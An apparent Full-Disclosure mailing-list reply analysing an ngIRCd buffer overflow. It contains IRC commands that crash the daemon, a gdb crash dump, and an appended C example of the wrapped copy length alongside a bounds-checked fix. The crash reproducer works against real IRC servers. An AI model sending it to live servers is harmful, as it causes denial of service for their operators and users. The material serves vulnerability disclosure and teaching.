Re: [Full-Disclosure] [ GLSA 200501-40 ] ngIRCd: Buffer overflow

From: qobaiashi (qobaiashi_at_gmx.net)
Date: 02/02/05

    To: Thierry Carrez <koon@gentoo.org>
    Date: Wed, 2 Feb 2005 22:15:00 +0100

    > Severity: High
    > Title: ngIRCd: Buffer overflow
    > Date: January 28, 2005
    > Bugs: #79705
    > ID: 200501-40
    >
    > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    >
    > Synopsis
    > ========
    >
    > ngIRCd is vulnerable to a buffer overflow that can be used to crash the
    > daemon and possibly execute arbitrary code.

    After a quick check, IMHO the bug is not exploitable (except for DoS):

    To reproduce the bug, do:

    /j #test
    /mode #test +I aaax300here@aaax128here

    and watch it go down in:

    Program received signal SIGSEGV, Segmentation fault.
    0x400c5b8c in memcpy () from /lib/libc.so.6
    (gdb) info all-registers
    eax 0x8067e2c 134643244
    ecx 0xffffad7f -21121
    edx 0x80650ca 134631626
    ebx 0xffffff53 -173
    esp 0xbfffeb24 0xbfffeb24
    ebp 0xbfffeb58 0xbfffeb58
    esi 0x806a29e 134652574
    edi 0x806d000 134664192
    eip 0x400c5b8c 0x400c5b8c

    Dump of assembler code for function memcpy:
    0x400c5b20 <memcpy>: push %edi
    0x400c5b21 <memcpy+1>: push %esi
    0x400c5b22 <memcpy+2>: mov 0xc(%esp,1),%edi
    0x400c5b26 <memcpy+6>: mov 0x10(%esp,1),%esi
    0x400c5b2a <memcpy+10>: mov 0x14(%esp,1),%ecx
    0x400c5b2e <memcpy+14>: mov %edi,%eax
    0x400c5b30 <memcpy+16>: cld
    0x400c5b31 <memcpy+17>: cmp $0x20,%ecx
    0x400c5b34 <memcpy+20>: jbe 0x400c5b8c <memcpy+108>
    0x400c5b36 <memcpy+22>: neg %eax
    0x400c5b38 <memcpy+24>: and $0x3,%eax
    0x400c5b3b <memcpy+27>: sub %eax,%ecx
    0x400c5b3d <memcpy+29>: xchg %eax,%ecx
    0x400c5b3e <memcpy+30>: repz movsb %ds:(%esi),%es:(%edi)
    0x400c5b40 <memcpy+32>: mov %eax,%ecx
    0x400c5b42 <memcpy+34>: sub $0x20,%ecx
    0x400c5b45 <memcpy+37>: js 0x400c5b85 <memcpy+101>
    0x400c5b47 <memcpy+39>: mov (%edi),%eax
    0x400c5b49 <memcpy+41>: mov 0x1c(%edi),%edx
    0x400c5b4c <memcpy+44>: sub $0x20,%ecx
    0x400c5b4f <memcpy+47>: mov (%esi),%eax
    0x400c5b51 <memcpy+49>: mov 0x4(%esi),%edx
    0x400c5b54 <memcpy+52>: mov %eax,(%edi)
    0x400c5b56 <memcpy+54>: mov %edx,0x4(%edi)
    0x400c5b59 <memcpy+57>: mov 0x8(%esi),%eax
    0x400c5b5c <memcpy+60>: mov 0xc(%esi),%edx
    0x400c5b5f <memcpy+63>: mov %eax,0x8(%edi)
    0x400c5b62 <memcpy+66>: mov %edx,0xc(%edi)
    0x400c5b65 <memcpy+69>: mov 0x10(%esi),%eax
    0x400c5b68 <memcpy+72>: mov 0x14(%esi),%edx
    0x400c5b6b <memcpy+75>: mov %eax,0x10(%edi)
    0x400c5b6e <memcpy+78>: mov %edx,0x14(%edi)
    0x400c5b71 <memcpy+81>: mov 0x18(%esi),%eax
    0x400c5b74 <memcpy+84>: mov 0x1c(%esi),%edx
    0x400c5b77 <memcpy+87>: mov %eax,0x18(%edi)
    0x400c5b7a <memcpy+90>: mov %edx,0x1c(%edi)
    0x400c5b7d <memcpy+93>: lea 0x20(%esi),%esi
    0x400c5b80 <memcpy+96>: lea 0x20(%edi),%edi
    0x400c5b83 <memcpy+99>: jns 0x400c5b49 <memcpy+41>
    0x400c5b85 <memcpy+101>: add $0x20,%ecx
    0x400c5b88 <memcpy+104>: mov 0xc(%esp,1),%eax
    0x400c5b8c <memcpy+108>: repz movsb %ds:(%esi),%es:(%edi)
    0x400c5b8e <memcpy+110>: pop %esi
    0x400c5b8f <memcpy+111>: pop %edi
    0x400c5b90 <memcpy+112>: ret
    0x400c5b91 <memcpy+113>: nop
    0x400c5b92 <memcpy+114>: nop
    0x400c5b93 <memcpy+115>: nop
    0x400c5b94 <memcpy+116>: nop
    0x400c5b95 <memcpy+117>: nop
    0x400c5b96 <memcpy+118>: nop
    0x400c5b97 <memcpy+119>: nop
    0x400c5b98 <memcpy+120>: nop
    0x400c5b99 <memcpy+121>: nop
    0x400c5b9a <memcpy+122>: nop
    0x400c5b9b <memcpy+123>: nop
    0x400c5b9c <memcpy+124>: nop
    0x400c5b9d <memcpy+125>: nop
    0x400c5b9e <memcpy+126>: nop
    0x400c5b9f <memcpy+127>: nop
    End of assembler dump.
    (gdb)

    yours
    -q
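In the register dump above, ecx holds 0xffffad7f (-21121) at the faulting repz movsb, i.e. a copy count that has wrapped, so memcpy walks off the heap until it reaches an unmapped page (edi = 0x806d000) rather than writing a bounded amount. The following is an added illustration of that failure mode and its fix, not ngIRCd's code or the poster's: a constructed "user@host" mask builder with the wrapping room computation beside a bounds-checked append; the 64-byte buffer, the function names and the 300/128-byte inputs are assumptions modelled on the reproducer.

```c
#include <string.h>
/* The failure mode behind a crash like the one above: "room left" as an unsigned
 * subtraction wraps to a huge count once used > buffer_len, and memcpy then runs
 * off the heap until it hits an unmapped page (cf. ecx = 0xffffad7f above). */
size_t unsafe_remaining(size_t buffer_len, size_t used)
{
    return buffer_len - used;   /* wraps when used > buffer_len */
}

/* Hardened append: never writes past dst[dst_len - 1], always NUL-terminates,
 * returns bytes actually copied, or -1 if *pos is already out of range. */
int checked_append(char *dst, size_t dst_len, size_t *pos, const char *src, size_t n)
{
    if (dst_len == 0 || *pos >= dst_len)
        return -1;
    size_t room = dst_len - 1 - *pos;   /* cannot wrap: *pos < dst_len */
    if (n > room) n = room;             /* truncate instead of overflowing */
    memcpy(dst + *pos, src, n);
    *pos += n;
    dst[*pos] = '\0';
    return (int)n;
}

/* Build a "user@host" mask from untrusted parts: 1 = truncated, 0 = fit, -1 = error. */
int build_mask(char *out, size_t out_len, const char *user, const char *host)
{
    const char *parts[3] = { user, "@", host };
    size_t pos = 0; int truncated = 0;
    for (int i = 0; i < 3; i++) {
        size_t want = strlen(parts[i]);
        int got = checked_append(out, out_len, &pos, parts[i], want);
        if (got < 0) return -1;
        if ((size_t)got < want)
            truncated = 1;
    }
    return truncated;
}

/* Constructed input shaped like the post's reproducer (300 'a's, '@', 128 'a's)
 * against a 64-byte mask; returns build_mask's result, strlen(out) in *mask_len. */
int long_param_demo(size_t *mask_len)
{
    char user[301], host[129], out[64];
    memset(user, 'a', 300); user[300] = '\0';
    memset(host, 'a', 128); host[128] = '\0';
    int rc = build_mask(out, sizeof out, user, host);
    *mask_len = strlen(out);
    return rc;
}
```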

